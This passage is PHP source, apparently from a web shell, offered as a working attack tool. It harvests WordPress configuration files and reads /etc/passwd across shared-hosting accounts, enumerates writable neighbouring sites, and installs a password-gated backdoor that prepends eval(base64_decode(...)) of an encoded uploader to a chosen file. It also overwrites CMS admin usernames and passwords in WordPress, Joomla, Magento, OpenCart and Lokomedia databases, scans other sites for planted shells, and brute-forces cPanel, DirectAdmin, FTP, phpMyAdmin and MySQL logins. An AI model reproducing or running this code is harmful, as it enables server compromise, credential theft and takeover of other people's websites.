- "/home3/$user_spade/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
- "/home3/$user_spade/public_html/Home/wp-config.php" => "WordPressHome",
- "/home3/$user_spade/public_html/HOME/wp-config.php" => "WordPressHome",
- "/home3/$user_spade/public_html/home/wp-config.php" => "WordPressHome",
- "/home3/$user_spade/public_html/NEW/wp-config.php" => "WordPressNew",
- "/home3/$user_spade/public_html/New/wp-config.php" => "WordPressNew",
- "/home3/$user_spade/public_html/new/wp-config.php" => "WordPressNew",
- "/home3/$user_spade/public_html/News/wp-config.php" => "WordPressNews",
- "/home3/$user_spade/public_html/NEWS/wp-config.php" => "WordPressNews",
- "/home3/$user_spade/public_html/news/wp-config.php" => "WordPressNews",
- "/home3/$user_spade/public_html/Cms/wp-config.php" => "WordPressCms",
- "/home3/$user_spade/public_html/CMS/wp-config.php" => "WordPressCms",
- "/home3/$user_spade/public_html/cms/wp-config.php" => "WordPressCms",
- "/home3/$user_spade/public_html/Main/wp-config.php" => "WordPressMain",
- "/home3/$user_spade/public_html/MAIN/wp-config.php" => "WordPressMain",
- "/home3/$user_spade/public_html/main/wp-config.php" => "WordPressMain",
- "/home3/$user_spade/public_html/Blog/wp-config.php" => "WordPressBlog",
- "/home3/$user_spade/public_html/BLOG/wp-config.php" => "WordPressBlog",
- "/home3/$user_spade/public_html/blog/wp-config.php" => "WordPressBlog",
- "/home3/$user_spade/public_html/Blogs/wp-config.php" => "WordPressBlogs",
- "/home3/$user_spade/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
- "/home3/$user_spade/public_html/blogs/wp-config.php" => "WordPressBlogs",
- "/home3/$user_spade/public_html/beta/wp-config.php" => "WordPressBeta",
- "/home3/$user_spade/public_html/Beta/wp-config.php" => "WordPressBeta",
- "/home3/$user_spade/public_html/BETA/wp-config.php" => "WordPressBeta",
- "/home3/$user_spade/public_html/PRESS/wp-config.php" => "WordPressPress",
- "/home3/$user_spade/public_html/Press/wp-config.php" => "WordPressPress",
- "/home3/$user_spade/public_html/press/wp-config.php" => "WordPressPress",
- "/home3/$user_spade/public_html/Wp/wp-config.php" => "WordPressWp",
- "/home3/$user_spade/public_html/wp/wp-config.php" => "WordPressWp",
- "/home3/$user_spade/public_html/WP/wp-config.php" => "WordPressWP",
- "/home3/$user_spade/public_html/portal/wp-config.php" => "WordPressPortal",
- "/home3/$user_spade/public_html/PORTAL/wp-config.php" => "WordPressPortal",
- "/home3/$user_spade/public_html/Portal/wp-config.php" => "WordPressPortal"
- );
- foreach($grab_config as $config => $nama_config) {
- $ambil_config = file_get_contents($config);
- if($ambil_config == '') {
- } else {
- $file_config = fopen("spade_config/$user_spade-$nama_config.txt","w");
- fputs($file_config,$ambil_config);
- }
- }
- }
- }
- echo "<center><a href='?dir=$dir/spade_config'><font color=lime>Done</font></a></center>";
- }else{
- echo "<form method=\"post\" action=\"\"><center>etc/passw ( Error ? <a href='?dir=$dir&do=passwbypass'>Bypass Here</a> )<br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
- echo file_get_contents('/etc/passwd');
- echo "</textarea><br><input type=\"submit\" value=\"Symlink that Sh!t\"></td></tr></center>\n";
- }
- } elseif($_GET['do'] == 'jumping') {
- $i = 0;
- echo "<center><h1 class='titulo'>JUMPING</h1></center><br>";
- echo "<div class='margin: 5px auto;'>";
- if(preg_match("/hsphere/", $dir)) {
- $urls = explode("\r\n", $_POST['url']);
- if(isset($_POST['jump'])) {
- echo "<pre>";
- foreach($urls as $url) {
- $url = str_replace(array("http://","www."), "", strtolower($url));
- $etc = "/etc/passwd";
- $f = fopen($etc,"r");
- while($gets = fgets($f)) {
- $pecah = explode(":", $gets);
- $user = $pecah[0];
- $dir_user = "/hsphere/local/home/$user";
- if(is_dir($dir_user) === true) {
- $url_user = $dir_user."/".$url;
- if(is_readable($url_user)) {
- $i++;
- $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
- if(is_writable($url_user)) {
- $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
- }
- echo $jrw."<br>";
- }
- }
- }
- }
- if($i == 0) {
- } else {
- echo "<br>There are/is ".$i." Website/s on this Webserver: ".gethostbyname($_SERVER['HTTP_HOST']);
- }
- echo "</pre>";
- } else {
- echo '<center>
- <form method="post">
- List Domains: <br>
- <textarea name="url" style="width: 500px; height: 250px;">';
- $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
- while($getss = fgets($fp)) {
- echo $getss;
- }
- echo '</textarea><br>
- <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
- </form></center>';
- }
- } elseif(preg_match("/vhosts/", $dir)) {
- $urls = explode("\r\n", $_POST['url']);
- if(isset($_POST['jump'])) {
- echo "<pre>";
- foreach($urls as $url) {
- $web_vh = "/var/www/vhosts/$url/httpdocs";
- if(is_dir($web_vh) === true) {
- if(is_readable($web_vh)) {
- $i++;
- $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
- if(is_writable($web_vh)) {
- $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
- }
- echo $jrw."<br>";
- }
- }
- }
- if($i == 0) {
- } else {
- echo "<br>There are/is ".$i." Website/s on this Webserver: ".gethostbyname($_SERVER['HTTP_HOST']);
- }
- echo "</pre>";
- } else {
- echo '<center>
- <form method="post">
- List Domains: <br>
- <textarea name="url" style="width: 500px; height: 250px;">';
- bing("ip:$ip");
- echo '</textarea><br>
- <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
- </form></center>';
- }
- } else {
- echo "<pre>";
- $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
- while($passwd = fgets($etc)) {
- if($passwd == '' || !$etc) {
- echo "<font color=red>Can't read /etc/passwd</font>";
- } else {
- preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
- foreach($user_jumping[1] as $user_idx_jump) {
- $user_jumping_dir = "/home/$user_idx_jump/public_html";
- if(is_readable($user_jumping_dir)) {
- $i++;
- $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
- if(is_writable($user_jumping_dir)) {
- $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
- }
- echo $jrw;
- if(function_exists('posix_getpwuid')) {
- $domain_jump = file_get_contents("/etc/named.conf");
- if($domain_jump == '') {
- echo " => ( <font color=red>Cant Resolve its Domain Name!</font> )<br>";
- } else {
- preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
- foreach($domains_jump[1] as $dj) {
- $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
- $user_jumping_url = $user_jumping_url['name'];
- if($user_jumping_url == $user_idx_jump) {
- echo " => ( <u>$dj</u> )<br>";
- break;
- }
- }
- }
- } else {
- echo "<br>";
- }
- }
- }
- }
- }
- if($i == 0) {
- } else {
- echo "<br>There are/is ".$i." Website/s on this Webserver: ".gethostbyname($_SERVER['HTTP_HOST']);
- }
- echo "</pre>";
- }
- echo "</div>";
- }elseif($_GET['do'] == 'backdoor'){
- $shell = "ZWNobyAiPHRpdGxlPlNwYWRlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzExMTExMT5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNwYWRlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOzxicj48YSBocmVmPSInLiRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddLiciPj4+OkdvIHRvIHlvdXIgZmlsZTo8PDwvYT4KKTwvZm9udD48L2E+PGZvbnQgY29sb3I9IiM3Q0ZDMDAiPjwvYj48YnI+PGJyPic7fWVsc2V7ZWNobyAnPGI+PGZvbnQgY29sb3I9IiM3Q0ZDMDAiPjxjZW50ZXI+VXBsb2FkIGZhaWxlZCA6KDwvZm9udD48L2E+PGZvbnQgY29sb3I9IiM3Q0ZDMDAiPjwvYj48YnI+PGJyPic7fX1lY2hvICc8Y2VudGVyPjxzcGFuIHN0eWxlPSJmb250LXNpemU6MzBweDsgYmFja2dyb3VuZDogdXJsKCZxdW90O2h0dHA6Ly9zb2xldmlzaWJsZS5jb20vaW1hZ2VzL2JnX2VmZmVjdF91cC5naWYmcXVvdDspIHJlcGVhdC14IHNjcm9sbCAwJSAwJSB0cmFuc3BhcmVudDsgY29sb3I6IGxpbWU7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7CiI+PHN0cm9uZz48Yj48YmlnPjVwNGQzQHByb3Rvbm1haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOw==";
- echo "<center><h1 class=titulo>INSTALL A BACKDOOR</h1><br><p1>Install a backdoor in a file :)</p1><form method=post>Backdoor Loader:: <input type=text name='filename' value='".$dir."/index.php'>Password:: <input type=text name='password' value='azazel'><input type=submit value='Install'></form>";
- if(isset($_POST['filename'])){
- $file = $_POST['filename'];
- $pword = $_POST['password'];
- $code = '<?php error_reporting(0); if(isset($_GET["spade"])){if($_GET["spade"] == "'.$pword.'"){ eval(base64_decode("'.$shell.'"));}}?>';
- if(@is_file($file)&&@is_writable($file)){ $put = @file_put_contents($file, $code."\n".@file_get_contents($file)); if($put){ echo "<br><font color=lime>Run Backdoor:: ".basename($file)."?spade=".$pword."</font>"; }else{ echo "<br><font color=red>Unable to Execute Backdoor!</font>"; }}
- }
- echo "</center>";
- } elseif($_GET['do'] == 'auto_edit_user') {
- if($_POST['hajar']) {
- if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
- echo "username or password should be more than 6 characters";
- } else {
- $user_baru = $_POST['user_baru'];
- $pass_baru = md5($_POST['pass_baru']);
- $conf = $_POST['config_dir'];
- $scan_conf = scandir($conf);
- foreach($scan_conf as $file_conf) {
- if(!is_file("$conf/$file_conf")) continue;
- $config = file_get_contents("$conf/$file_conf");
- if(preg_match("/JConfig|joomla/",$config)) {
- $dbhost = ambilkata($config,"host = '","'");
- $dbuser = ambilkata($config,"user = '","'");
- $dbpass = ambilkata($config,"password = '","'");
- $dbname = ambilkata($config,"db = '","'");
- $dbprefix = ambilkata($config,"dbprefix = '","'");
- $prefix = $dbprefix."users";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
- $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
- $result = mysql_fetch_array($q);
- $id = $result['id'];
- $site = ambilkata($config,"sitename = '","'");
- $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
- echo "Config => ".$file_conf."<br>";
- echo "CMS => Joomla<br>";
- if($site == '') {
- echo "Sitename => <font color=red>error, could not take his domain name/font><br>";
- } else {
- echo "Sitename => $site<br>";
- }
- if(!$update OR !$conn OR !$db) {
- echo "Status => <font color=red>".mysql_error()."</font><br><br>";
- } else {
- echo "Status => <font color=lime>Successful edit user, please login with new user and pass.</font><br><br>";
- }
- mysql_close($conn);
- } elseif(preg_match("/WordPress/",$config)) {
- $dbhost = ambilkata($config,"DB_HOST', '","'");
- $dbuser = ambilkata($config,"DB_USER', '","'");
- $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
- $dbname = ambilkata($config,"DB_NAME', '","'");
- $dbprefix = ambilkata($config,"table_prefix = '","'");
- $prefix = $dbprefix."users";
- $option = $dbprefix."options";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
- $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
- $result = mysql_fetch_array($q);
- $id = $result[ID];
- $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
- $result2 = mysql_fetch_array($q2);
- $target = $result2[option_value];
- if($target == '') {
- $url_target = "Login => <font color=red>error, could not take his domain name</font><br>";
- } else {
- $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
- }
- $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
- echo "Config => ".$file_conf."<br>";
- echo "CMS => Wordpress<br>";
- echo $url_target;
- if(!$update OR !$conn OR !$db) {
- echo "Status => <font color=red>".mysql_error()."</font><br><br>";
- } else {
- echo "Status => <font color=lime>Successful edit user, please login with new user and pass.</font><br><br>";
- }
- mysql_close($conn);
- } elseif(preg_match("/Magento|Mage_Core/",$config)) {
- $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
- $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
- $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
- $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
- $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
- $prefix = $dbprefix."admin_user";
- $option = $dbprefix."core_config_data";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
- $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
- $result = mysql_fetch_array($q);
- $id = $result[user_id];
- $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
- $result2 = mysql_fetch_array($q2);
- $target = $result2[value];
- if($target == '') {
- $url_target = "Login => <font color=red>error, could not take his domain name</font><br>";
- } else {
- $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
- }
- $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
- echo "Config => ".$file_conf."<br>";
- echo "CMS => Magento<br>";
- echo $url_target;
- if(!$update OR !$conn OR !$db) {
- echo "Status => <font color=red>".mysql_error()."</font><br><br>";
- } else {
- echo "Status => <font color=lime>Successful edit user, please login with new user and pass.</font><br><br>";
- }
- mysql_close($conn);
- } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
- $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
- $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
- $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
- $dbname = ambilkata($config,"'DB_DATABASE', '","'");
- $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
- $prefix = $dbprefix."user";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
- $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
- $result = mysql_fetch_array($q);
- $id = $result[user_id];
- $target = ambilkata($config,"HTTP_SERVER', '","'");
- if($target == '') {
- $url_target = "Login => <font color=red>error, could not take his domain name</font><br>";
- } else {
- $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
- }
- $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
- echo "Config => ".$file_conf."<br>";
- echo "CMS => OpenCart<br>";
- echo $url_target;
- if(!$update OR !$conn OR !$db) {
- echo "Status => <font color=red>".mysql_error()."</font><br><br>";
- } else {
- echo "Status => <font color=lime>Successful edit user, please login with new user and pass.</font><br><br>";
- }
- mysql_close($conn);
- } elseif(preg_match("/xss validation function call and injection/",$config)) {
- $dbhost = ambilkata($config,'server = "','"');
- $dbuser = ambilkata($config,'username = "','"');
- $dbpass = ambilkata($config,'password = "','"');
- $dbname = ambilkata($config,'database = "','"');
- $prefix = "users";
- $option = "identitas";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
- $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
- $result = mysql_fetch_array($q);
- $target = $result[alamat_website];
- if($target == '') {
- $target2 = $result[url];
- $url_target = "Login => <font color=red>error, could not take his domain name</font><br>";
- if($target2 == '') {
- $url_target2 = "Login => <font color=red>error, could not take his domain name</font><br>";
- } else {
- $cek_login3 = file_get_contents("$target2/adminweb/");
- $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
- if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
- $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
- } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
- $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
- } else {
- $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
- }
- }
- } else {
- $cek_login = file_get_contents("$target/adminweb/");
- $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
- if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
- $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
- } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
- $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
- } else {
- $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
- }
- }
- $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
- echo "Config => ".$file_conf."<br>";
- echo "CMS => Lokomedia<br>";
- if(preg_match('/error, could not take his domain name/', $url_target)) {
- echo $url_target2;
- } else {
- echo $url_target;
- }
- if(!$update OR !$conn OR !$db) {
- echo "Status => <font color=red>".mysql_error()."</font><br><br>";
- } else {
- echo "Status => <font color=lime>Successful edit user, please login with new user and pass.</font><br><br>";
- }
- mysql_close($conn);
- }
- }
- }
- } else {
- echo "<center>
- <h1 class='titulo'>AUTO EDIT USER CONFIG</h1>
- <form method='post'>
- DIR Config: <br>
- <input type='text' size='50' name='config_dir' value='$dir'><br><br>
- Set User & Pass: <br>
- <input type='text' name='user_baru' value='Spade' placeholder='user_baru'><br>
- <input type='text' name='pass_baru' value='Spade' placeholder='pass_baru'><br>
- <input type='submit' name='hajar' value='Submit' style='width: 215px;'>
- </form>
- <span>NB: These tools work if run in a folder <u>config</u> ( ex: /home/user/public_html/name_folder_config )</span><br>
- ";
- };
- }elseif($_GET['do'] == 'shelscan') {
- echo'<center><h1 class="titulo">Shell Finder</h1>
- <form action="" method="post">
- <input type="text" size="50" name="traget" value="http://www.site.com/"/>
- <br>
- <input name="scan" value="Start Scaning" style="width: 215px;" type="submit">
- </form><br>';
- if (isset($_POST["scan"])) {
- $url = $_POST['traget'];
- echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
- echo "Result :<br />";
- $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
- "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
- "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
- "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
- "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
- "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
- "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
- "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
- "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
- "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
- "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
- "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
- "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
- "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
- "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
- "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
- "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
- "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
- "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
- "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
- "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
- "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
- "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
- "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
- "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","cox.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
- foreach ($shells as $shell){
- $headers = get_headers("$url$shell"); //
- if (eregi('200', $headers[0])) {
- echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Done :D</span><br /><br/><br/>"; //
- $dz = fopen('shells.txt', 'a+');
- $suck = "$url$shell";
- fwrite($dz, $suck."\n");
- }
- }
- echo "Shell [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>";
- }
- } elseif($_GET['do'] == 'cpanel') {
- if(strtolower(substr(PHP_OS, 0, 3)) === 'win'){ echo "<center><font color=red>This Feature is Temporarily Blocked on Windows Server :(</font></center>"; }else{
- function Alfa_DirectAdmin_Cracker($info){ if(!$info['mysql']) $url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN';
- else $url = $info['protocol'].$info['target'].'/phpmyadmin';
- $curl = curl_init();
- curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
- curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
- curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
- curl_setopt($curl, CURLOPT_HEADER,0);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($curl, CURLOPT_URL,$url);
- curl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']);
- if($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
- $result = curl_exec($curl);
- $curl_errno = curl_errno($curl);
- $curl_error = curl_error($curl);
- if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";
- } elseif(preg_match('/CMD_FILE_MANAGER|frameset/i',$result)){ echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
- $info['target'] = $url;
- CrackerResualt($info);
- } curl_close($curl);
- }
- function Alfa_CP_Cracker($info){ $url = $info['protocol'].$info['target'].':'.$info['port'];
- $curl = curl_init();
- curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
- curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
- curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
- curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
- curl_setopt($curl, CURLOPT_HEADER,0);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
- curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'].":".$info['password']) . "\n\r"));
- curl_setopt($curl, CURLOPT_URL, $url);
- $result = curl_exec($curl);
- $curl_errno = curl_errno($curl);
- $curl_error = curl_error($curl);
- if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";
- } elseif(preg_match('/filemanager/i',$result)){ echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
- $info['target'] = $url;
- CrackerResualt($info);
- } curl_close($curl);
- }
- function Alfa_FTP_Cracker($info){ $url = $info['protocol'].$info['target'];
- $curl = curl_init();
- curl_setopt($curl, CURLOPT_URL, $url);
- curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($curl, CURLOPT_USERPWD, "".$info['username'].":".$info['password']."");
- $result = curl_exec($curl);
- $curl_errno = curl_errno($curl);
- $curl_error = curl_error($curl);
- if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";
- } elseif(preg_match('/(\d+):(\d+)/i',$result)){ echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
- $info['target'] = $url;
- CrackerResualt($info);
- } curl_close($curl);
- }
- function Alfa_Mysql_Cracker($info){ if(@mysqli_connect($info['target'].':'.$info['port'],$info['username'],$info['password'])){ CrackerResualt($info);
- echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
- } }
- function Alfa_FTPC($info){ if($con=@ftp_connect($info['target'],$info['port'])){ if($con){ $login=@ftp_login($con,$info['username'],$info['password']);
- if($login){CrackerResualt($info);
- }}} @ftp_close($con);
- }
- function CrackerResualt($info){ $res = $info['target'].' => '.$info['username'].":".$info['password']."\n" ;
- $c = @fopen($info['fcrack'],'a+');
- @fwrite($c, $res);
- @fclose($c);
- }
- function Alfa_Call_Function_Cracker($method,$info){ switch($method){case 'cp':return Alfa_CP_Cracker($info);
- break;
- case 'direct': case 'phpmyadmin':return Alfa_DirectAdmin_Cracker($info);
- break;
- case 'ftp':return Alfa_FTP_Cracker($info);
- break;
- case 'mysql':return Alfa_Mysql_Cracker($info);
- break;
- case 'mysql':return Alfa_FTPC($info);
- break;
- } }
- echo "<center><h1 class=titulo>Cracker</h1><br>
- <form method=post> Login Panel:: <select name='loginpanel'>
- <option value='cp'>Cpanel</option>
- <option value='direct'>Direct Admin</option>
- <option value='ftp'>FTP</option>
- <option value='phpmyadmin'>PhpMyAdmin</option>
- <option value='mysql'>mysql_connect()</option>
- <option value='ftpc'>ftp_connect()</option>
- </select> Protocol:: <select name='protocol'>
- <option value='https://'>https://</option>
- <option value='http://'>http://</option>
- <option value='ftp://'>ftp://</option>
